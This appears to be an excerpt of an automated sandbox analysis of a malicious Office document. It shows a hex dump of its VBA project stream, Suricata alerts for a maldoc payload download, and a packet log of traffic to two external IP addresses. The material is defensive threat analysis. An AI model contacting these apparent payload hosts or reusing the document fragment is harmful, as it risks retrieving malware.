                                                        Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . s . i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                                                        Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 73 f0 05 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                        Network Behavior

                                                        Suricata IDS Alerts

                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-09-27T10:27:41.811382+02002019696ET MALWARE Possible MalDoc Payload Download Nov 11 20141192.168.2.2249173185.18.213.20443TCP
                                                        2024-09-27T10:27:41.811382+02002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.2249173185.18.213.20443TCP
                                                        2024-09-27T10:27:44.294980+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249174185.18.213.20443TCP

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Sep 27, 2024 10:27:13.866991997 CEST49163443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:13.867090940 CEST44349163104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:13.867196083 CEST49163443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:13.888407946 CEST49163443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:13.888454914 CEST44349163104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:14.356899977 CEST44349163104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:14.357033968 CEST49163443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:14.371049881 CEST49163443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:14.371104956 CEST44349163104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:14.371584892 CEST44349163104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:14.371654034 CEST49163443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:14.537800074 CEST49163443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:14.579436064 CEST44349163104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:14.984955072 CEST44349163104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:14.985029936 CEST44349163104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:14.985145092 CEST49163443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:14.985413074 CEST49163443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:14.989981890 CEST49163443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:14.990039110 CEST44349163104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:14.999330997 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.004426003 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.004538059 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.004591942 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.009439945 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.639127970 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.639174938 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.639204979 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.639235973 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.639287949 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.639323950 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.639347076 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.639348030 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.639373064 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.639373064 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.639421940 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.639456034 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.639487982 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.639488935 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.639508009 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.639523029 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.639523983 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.639573097 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.644385099 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.644419909 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.644454002 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.644479036 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.644511938 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.729780912 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.729831934 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.729850054 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.729867935 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.729882002 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.729917049 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.730010986 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.730010986 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.730108023 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.730178118 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.730249882 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.730295897 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.730313063 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.730334044 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.730349064 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.730360031 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.730365038 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.730387926 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.730387926 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.730417967 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.731131077 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.731158972 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.731173038 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.731187105 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.731194019 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.731232882 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.731232882 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.731232882 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.731700897 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.731733084 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.731755018 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.731761932 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.731769085 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.731784105 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.731785059 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.731805086 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.731820107 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.732136011 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.732548952 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.732563972 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.732578993 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.732595921 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.732637882 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.810914040 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.810990095 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.811151028 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.811181068 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.811208010 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.811213017 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.811237097 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.811252117 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.820288897 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.820363998 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.820408106 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.820437908 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.820472002 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.820496082 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.820550919 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.820584059 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.820616007 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.820616961 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.820641041 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.820689917 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.821098089 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.821131945 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.821163893 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.821178913 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.821178913 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.821196079 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.821217060 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.821228027 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.821252108 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.821259975 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.821284056 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.821295023 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.821321964 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.821338892 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.821340084 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.821400881 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.821592093 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.821654081 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.821733952 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.821765900 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.821790934 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.821798086 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.821813107 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.821850061 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.821855068 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.821885109 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.821907997 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.821916103 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.821924925 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.821950912 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.821976900 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.821995974 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.822597980 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.822649956 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.822660923 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.822683096 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.822707891 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.822715998 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.822750092 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.822781086 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.822812080 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.822839022 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.822844982 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.822854996 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.822875977 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.822894096 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.823672056 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.823704004 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.823841095 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.823872089 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.823872089 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.823874950 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.823901892 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.823906898 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.823939085 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.823961973 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.823961973 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.823988914 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.897070885 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.897161961 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.897196054 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.897209883 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.897244930 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.897279978 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.897311926 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.897342920 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.897373915 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.897407055 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.897440910 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.897542000 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.897542000 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.897542000 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.897542000 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.897542000 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.897542953 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.897542953 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.897542953 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.897592068 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.902291059 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.902338982 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.902373075 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.902383089 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.902383089 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.902405024 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.902429104 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.902441025 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.902519941 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.902519941 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.911073923 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.911093950 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.911112070 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:15.911170959 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:15.911170959 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:16.127083063 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:16.127171040 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:16.567028046 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:16.567250013 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:17.430974007 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:17.431091070 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:19.131848097 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:19.132033110 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:19.330555916 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:19.335747957 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:19.335779905 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:19.335788012 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:19.335797071 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:19.335896015 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:19.932028055 CEST49165443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:19.932080030 CEST44349165104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:19.932127953 CEST49165443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:19.936619043 CEST49165443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:19.936635971 CEST44349165104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:21.210227013 CEST8049164185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:21.210361958 CEST4916480192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:21.211630106 CEST44349165104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:21.211728096 CEST49165443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:21.216597080 CEST49165443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:21.216605902 CEST44349165104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:21.216900110 CEST44349165104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:21.216960907 CEST49165443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:21.337107897 CEST49165443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:21.383404016 CEST44349165104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:21.719439030 CEST44349165104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:21.719543934 CEST44349165104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:21.719651937 CEST49165443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:21.765043974 CEST49165443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:21.765080929 CEST44349165104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:21.765130043 CEST49165443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:21.765180111 CEST49165443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:23.403121948 CEST49166443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:23.403217077 CEST44349166104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:23.403306961 CEST49166443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:23.403765917 CEST49166443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:23.403788090 CEST44349166104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:23.870840073 CEST44349166104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:23.870995045 CEST49166443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:23.876765966 CEST49166443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:23.876791000 CEST44349166104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:23.877151966 CEST44349166104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:23.885555029 CEST49166443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:23.931406975 CEST44349166104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:24.273339987 CEST44349166104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:24.273497105 CEST44349166104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:24.273665905 CEST49166443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:24.273780107 CEST49166443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:24.273808956 CEST44349166104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:24.273869991 CEST49166443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:24.273885012 CEST44349166104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:27.840054035 CEST49167443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:27.840099096 CEST44349167104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:27.840181112 CEST49167443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:27.840970039 CEST49167443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:27.840984106 CEST44349167104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:28.328521013 CEST44349167104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:28.328588009 CEST49167443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:28.333545923 CEST49167443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:28.333568096 CEST44349167104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:28.333854914 CEST44349167104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:28.349226952 CEST49167443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:28.395405054 CEST44349167104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:28.763758898 CEST44349167104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:28.763853073 CEST44349167104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:28.763909101 CEST49167443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:28.770952940 CEST49167443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:28.770976067 CEST44349167104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:29.164953947 CEST49168443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:29.164984941 CEST44349168104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:29.165047884 CEST49168443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:29.165322065 CEST49168443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:29.165333033 CEST44349168104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:29.626796007 CEST44349168104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:29.626940966 CEST49168443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:29.633075953 CEST49168443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:29.633083105 CEST44349168104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:29.633363962 CEST44349168104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:29.638083935 CEST49168443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:29.683404922 CEST44349168104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:30.043447971 CEST44349168104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:30.043553114 CEST44349168104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:30.043710947 CEST49168443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:30.050807953 CEST49168443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:30.050831079 CEST44349168104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:30.070013046 CEST49169443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:30.070086956 CEST44349169104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:30.070180893 CEST49169443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:30.070363045 CEST49169443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:30.070378065 CEST44349169104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:30.537594080 CEST44349169104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:30.538654089 CEST49169443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:30.538666964 CEST44349169104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:30.539597034 CEST49169443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:30.539602041 CEST44349169104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:30.956741095 CEST44349169104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:30.956841946 CEST44349169104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:30.956984997 CEST49169443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:30.957096100 CEST49169443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:30.957118988 CEST44349169104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:31.577064991 CEST49170443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:31.577131033 CEST44349170104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:31.577214956 CEST49170443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:31.577687025 CEST49170443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:31.577701092 CEST44349170104.21.64.88192.168.2.22
